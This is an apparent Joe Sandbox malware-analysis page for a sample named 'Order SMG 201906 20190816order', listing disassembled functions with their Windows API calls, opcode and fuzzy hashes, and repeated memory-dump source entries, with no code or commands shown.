Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 23476ad00b1c133f1f77fd0b13a0606d68f7732e4638b2d096305fe921693c16
Instruction ID: f2f30b271a6af74a9d7b134cde8f3afa5d8ff7ebb5d92f8591c0153e2dca6813
Opcode Fuzzy Hash: 23476ad00b1c133f1f77fd0b13a0606d68f7732e4638b2d096305fe921693c16
Instruction Fuzzy Hash: C521D431701601BBEB119F60DC00F7BB7A9FF8471AF00402FBE159B6A1D7759869A798

Function 00458A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00458AE0
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458AF2
accept.WSOCK32(00000000,00000000,00000000), ref: 00458AFF
WSAGetLastError.WSOCK32(00000000), ref: 00458B16

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: 711e5e09de6b334ae93931dc8d7817e6883ab6da51fd9947bc8cc4e3ff753325
Instruction ID: cec81d560cfc8959454608d08dcc177ad0e4f6f8aca8df67afe39ee5a7d451b4
Opcode Fuzzy Hash: 711e5e09de6b334ae93931dc8d7817e6883ab6da51fd9947bc8cc4e3ff753325
Instruction Fuzzy Hash: 9E21C372A011249FC7109F69C885A9EBBECEF49310F00416EF849E7291DB789A458F94

Function 00468A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00468AA6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00468AC0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00468ACE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00468ADC

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: ec46bcc3424c7f0b60b5022ca69ac279ce60391e6094a870371a726020423920
Instruction ID: 3b2d1d0a209467fe1eaa344d409eb254f997c443b6415a419c9b2e187924ca12
Opcode Fuzzy Hash: ec46bcc3424c7f0b60b5022ca69ac279ce60391e6094a870371a726020423920
Instruction Fuzzy Hash: 3811E131606011AFDB04AB54CC05FBE7799AF85324F14422EFC16D72E2DBB8AC008799

Function 00440AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00441E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00440ABB,?,?,?,0044187A,00000000,000000EF,00000119,?,?), ref: 00441E77
Part of subcall function 00441E68: lstrcpyW.KERNEL32(00000000,?,?,00440ABB,?,?,?,0044187A,00000000,000000EF,00000119,?,?,00000000), ref: 00441E9D
Part of subcall function 00441E68: lstrcmpiW.KERNEL32(00000000,?,00440ABB,?,?,?,0044187A,00000000,000000EF,00000119,?,?), ref: 00441ECE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0044187A,00000000,000000EF,00000119,?,?,00000000), ref: 00440AD4
lstrcpyW.KERNEL32(00000000,?,?,0044187A,00000000,000000EF,00000119,?,?,00000000), ref: 00440AFA
lstrcmpiW.KERNEL32(00000002,cdecl,?,0044187A,00000000,000000EF,00000119,?,?,00000000), ref: 00440B2E

Strings

cdecl, xrefs: 00440B25

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: e6c6f91e1f925b026ed40e71a82c0bfa30e809dbf06e465832c3f79b73ca7e33
Instruction ID: c7304db2e455f905d58f141a894c6769a3b5098f9c982885bc3ade38f0d3ce7e
Opcode Fuzzy Hash: e6c6f91e1f925b026ed40e71a82c0bfa30e809dbf06e465832c3f79b73ca7e33
Instruction Fuzzy Hash: 95110636200344AFEB209F64CC05D7A77A8FF45354B80412FE905CB2A0EB75E851C7A8

Function 0044058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 004405AC
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 004405C7
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 004405DD
FreeLibrary.KERNEL32(?), ref: 00440632

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: f0cd12355e3132ddb083e152e96d740e52cdadc459700f0ffee6bc6ccb3138cf
Instruction ID: edd6db39d660dcb4e0c32f863c5204c469b601a469209fca3a932210d4679436
Opcode Fuzzy Hash: f0cd12355e3132ddb083e152e96d740e52cdadc459700f0ffee6bc6ccb3138cf
Instruction Fuzzy Hash: 5021B471900208EFEB20DF95DC89ADBBBB8EF40704F00846EE61792150D778EA65DF59

Function 00446713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00446733
_memset.LIBCMT ref: 00446754
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 004467A6
CloseHandle.KERNEL32(00000000), ref: 004467AF

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 57569ce16a0975a2dbef6d9475e3719aebf367813c675b98e9dbb44cfd24af0e
Instruction ID: 8b91472a63e09bb99e4025de3935e9e18f15fd5f322b2290e887984ed070b48b
Opcode Fuzzy Hash: 57569ce16a0975a2dbef6d9475e3719aebf367813c675b98e9dbb44cfd24af0e
Instruction Fuzzy Hash: E5110A71D022287AE73067A5AC4DFAFBBBCEF45764F1045AAF904E71D0D2744E808B69

Function 0043B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 0043B498
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0043B4AA
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0043B4C0
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0043B4DB

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d7db90abbb064ebfa12c2c59eb7c57e2b67861bd6856f74568c7db798ce12fec
Instruction ID: 8899dad3a5a672da7911a65e4843f6e45b4eb2c78a03a80d9270399c9af6d800
Opcode Fuzzy Hash: d7db90abbb064ebfa12c2c59eb7c57e2b67861bd6856f74568c7db798ce12fec
Instruction Fuzzy Hash: 9F11367A900218BFDB11DBA9C981F9DBBB4FB08700F204096E604B7290D771AE11DB98

Function 0041B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0041B5A5
GetClientRect.USER32(?,?), ref: 0047E69A
GetCursorPos.USER32(?), ref: 0047E6A4
ScreenToClient.USER32(?,?), ref: 0047E6AF

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 67ac9f4910a2dd253858acbbaaaecb0b8e2d9fabf8ddc0337399032a92a3f85b
Instruction ID: 8a38cf26b2289de6e14f6fa3ca0c761f9cf1d87495578927ec2939f6d18f8468
Opcode Fuzzy Hash: 67ac9f4910a2dd253858acbbaaaecb0b8e2d9fabf8ddc0337399032a92a3f85b
Instruction Fuzzy Hash: 0F114831A01029BFCB10DF95DC459EE77B9EF09308F40486AF901E7241D338AA92CBA9

Function 0044732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00447352
MessageBoxW.USER32(?,?,?,?), ref: 00447385
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0044739B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004473A2

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 8d848b8ac86ef35913a18f1b1a2f46bed8395f8dd1acfa7b340fbcc45a54e7f7
Instruction ID: 65718a7269fcb76229fcf2b12d524195cd6f7c0b01429baa910b87b3e570ebb2
Opcode Fuzzy Hash: 8d848b8ac86ef35913a18f1b1a2f46bed8395f8dd1acfa7b340fbcc45a54e7f7
Instruction Fuzzy Hash: 1911E572A04214ABDB019FAC9C05E9E7BA99B48311F14426AFC21D3291D7748D019BA9

Function 0041D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0041D1BA
GetStockObject.GDI32(00000011), ref: 0041D1CE
SendMessageW.USER32(00000000,00000030,00000000), ref: 0041D1D8

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 57456f8325da7f8a3214a3def386806872fe646a797bb9acc53fd499b00bb943
Instruction ID: 20e8855dbb7d0dd181b5275668110b09493867f9601d5c4c54c49d70e43e613b
Opcode Fuzzy Hash: 57456f8325da7f8a3214a3def386806872fe646a797bb9acc53fd499b00bb943
Instruction Fuzzy Hash: 4111C4B2901509BFEF125F90DC54EEB7B69FF08364F044116FA0552150C735DCA0DBA4

Function 00434DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00434E16

Part of subcall function 004354F5: __fltout2.LIBCMT ref: 0043551E

__cftog_l.LIBCMT ref: 00434E3C
__cftoe_l.LIBCMT ref: 00434E6E

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: e217e9a68c89cc3a703717b2c0a853f5b8c9668b7614545f64a0a403a3b518ad
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: AC014C3200014EBBCF125E84DC028EE3F23BB5C355F589456FE1859135D33AEAB2AB89

Function 00427452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00427A0D: __getptd_noexit.LIBCMT ref: 00427A0E

__lock.LIBCMT ref: 0042748F
InterlockedDecrement.KERNEL32(?), ref: 004274AC
_free.LIBCMT ref: 004274BF
InterlockedIncrement.KERNEL32(00CECCA0), ref: 004274D7

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: e85fa5979924f29de3294b51c57e7de164a3bbaac4adaaf32aa5e59ef576da78
Instruction ID: de51e5ee548e769ed021d111760f6c39ee054f2497822ded0c01ceae259c3d71
Opcode Fuzzy Hash: e85fa5979924f29de3294b51c57e7de164a3bbaac4adaaf32aa5e59ef576da78
Instruction Fuzzy Hash: 0D018E31B06631A7C711BF66B80575EBB60BF04714F95411FE81563690C72C6911CBDE

Function 0046DFDE Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0046DFF7
ScreenToClient.USER32(?,?), ref: 0046E00F
ScreenToClient.USER32(?,?), ref: 0046E033
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 0046E04E

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 25bce7ecd0d7d9955c0dc39e35bb419becf96bf02c45341fdd09bb66b44f6ac1
Instruction ID: e0d3f594d69204eb1219e3f1ef5056e3ff3a133222dbc9b048509ae7567444b3
Opcode Fuzzy Hash: 25bce7ecd0d7d9955c0dc39e35bb419becf96bf02c45341fdd09bb66b44f6ac1
Instruction Fuzzy Hash: C4114CB9D0020DAFDB01DFA8C8849EEBBF9FF18200F108166E925E3250E735AA55CF55

Function 0046EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0041AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041AFE3
Part of subcall function 0041AF83: SelectObject.GDI32(?,00000000), ref: 0041AFF2
Part of subcall function 0041AF83: BeginPath.GDI32(?), ref: 0041B009
Part of subcall function 0041AF83: SelectObject.GDI32(?,00000000), ref: 0041B033

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0046EA8E
LineTo.GDI32(00000000,?,?), ref: 0046EA9B
EndPath.GDI32(00000000), ref: 0046EAAB
StrokePath.GDI32(00000000), ref: 0046EAB9

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 132eab10170ff87f668f491e9c6a38ef3bc77fac0659604b84b6d5658f4b221e
Instruction ID: 7d6768de46838a1e0420bdc3075050136730bf049448a9ce4948047e77d7b045
Opcode Fuzzy Hash: 132eab10170ff87f668f491e9c6a38ef3bc77fac0659604b84b6d5658f4b221e
Instruction Fuzzy Hash: 9FF0BE31502259BBDB12AF94AC0DFCE3F5AAF06314F044216FA01640F183785562CB9E

Function 0043C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0043C84A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0043C85D
GetCurrentThreadId.KERNEL32 ref: 0043C864
AttachThreadInput.USER32(00000000), ref: 0043C86B

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 2f82786ce60a8669e5e91d6cc08f2db72e8021f9279a3ee78326b1a69e8319d0
Instruction ID: be0358667f426e6c30f78aba5f721580d23a9c17b88f7cc5dcbf179fbb72207b
Opcode Fuzzy Hash: 2f82786ce60a8669e5e91d6cc08f2db72e8021f9279a3ee78326b1a69e8319d0
Instruction Fuzzy Hash: 10E0657154222876DB102BA2DC4DEDF7F1CEF157A1F008425B50DA4490D775C581CBE4

Function 0043B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0043B0D6
OpenThreadToken.ADVAPI32(00000000), ref: 0043B0DD
GetCurrentProcess.KERNEL32(00000028,?), ref: 0043B0EA
OpenProcessToken.ADVAPI32(00000000), ref: 0043B0F1

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

